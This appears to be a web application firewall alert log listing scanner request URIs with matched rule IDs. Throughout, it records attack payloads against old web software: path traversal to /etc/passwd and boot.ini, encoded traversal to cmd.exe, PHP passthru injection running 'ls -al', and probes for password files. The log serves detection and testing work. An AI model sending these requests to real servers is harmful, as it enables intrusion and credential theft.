Packet [3491]	Uri [/WebAdmin.dll?View=Logon]	Nattacks [1 ]	Signatures	[920440]
Packet [3499]	Uri [/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3533]	Uri [/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3534]	Uri [/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [3552]	Uri [/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3554]	Uri [/whatever.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [3563]	Uri [/WS_FTP.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [3564]	Uri [/ws_ftp.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [3565]	Uri [/WS_FTP.LOG]	Nattacks [1 ]	Signatures	[920440]
Packet [3583]	Uri [/wx/s.dll?d=/boot.ini]	Nattacks [2 ]	Signatures	[920440]	[930120]
Packet [3590]	Uri [/xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS]	Nattacks [1 ]	Signatures	[942260]
Packet [3597]	Uri [/YGFPU.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [3604]	Uri [/[SecCheck]/..%252f..%252f../ext.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [3605]	Uri [/[SecCheck]/..%252f..%252f../extSensePostNotThereNoNo.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [3606]	Uri [/[SecCheck]/..%255c..%255c../ext.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [3607]	Uri [/[SecCheck]/..%255c..%255c../extSensePostNotThereNoNo.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [3608]	Uri [/[SecCheck]/..%2f../ext.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [3609]	Uri [/[SecCheck]/..%2f../extSensePostNotThereNoNo.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [3643]	Uri [/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [3644]	Uri [/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [3661]	Uri [/_vti_bin/shtml.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3670]	Uri [/_vti_bin/shtSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3672]	Uri [/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false]	Nattacks [1 ]	Signatures	[920440]
Packet [3674]	Uri [/_vti_bin/_vti_aut/autSensePostNotThereNoNo.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false]	Nattacks [1 ]	Signatures	[920440]
Packet [3676]	Uri [/_vti_bin/_vti_aut/dvwSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3677]	Uri [/_vti_bin/_vti_aut/dvwssr.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3678]	Uri [/_vti_bin/_vti_aut/fp30reg.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3679]	Uri [/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]	Nattacks [1 ]	Signatures	[920440]
Packet [3680]	Uri [/_vti_bin/_vti_aut/fp3SensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3690]	Uri [/_vti_pvt/administrators.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [3691]	Uri [/_vti_pvt/admSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [3692]	Uri [/_vti_pvt/authors.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [3693]	Uri [/_vti_pvt/autSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [3697]	Uri [/_vti_pvt/serSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [3699]	Uri [/_vti_pvt/service.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [3703]	Uri [/_vti_pvt/users.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [3704]	Uri [/_vti_pvt/useSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [3712]	Uri [@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920100]	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [3713]	Uri [@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920100]	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [3714]	Uri [@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [8 ]	Signatures	[920100]	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [3715]	Uri [@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [8 ]	Signatures	[920100]	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [3718]	Uri [@NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920100]	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [3719]	Uri [@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [8 ]	Signatures	[920100]	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
# N. packets [3721], [639] with alerts, N. Alerts [1769]
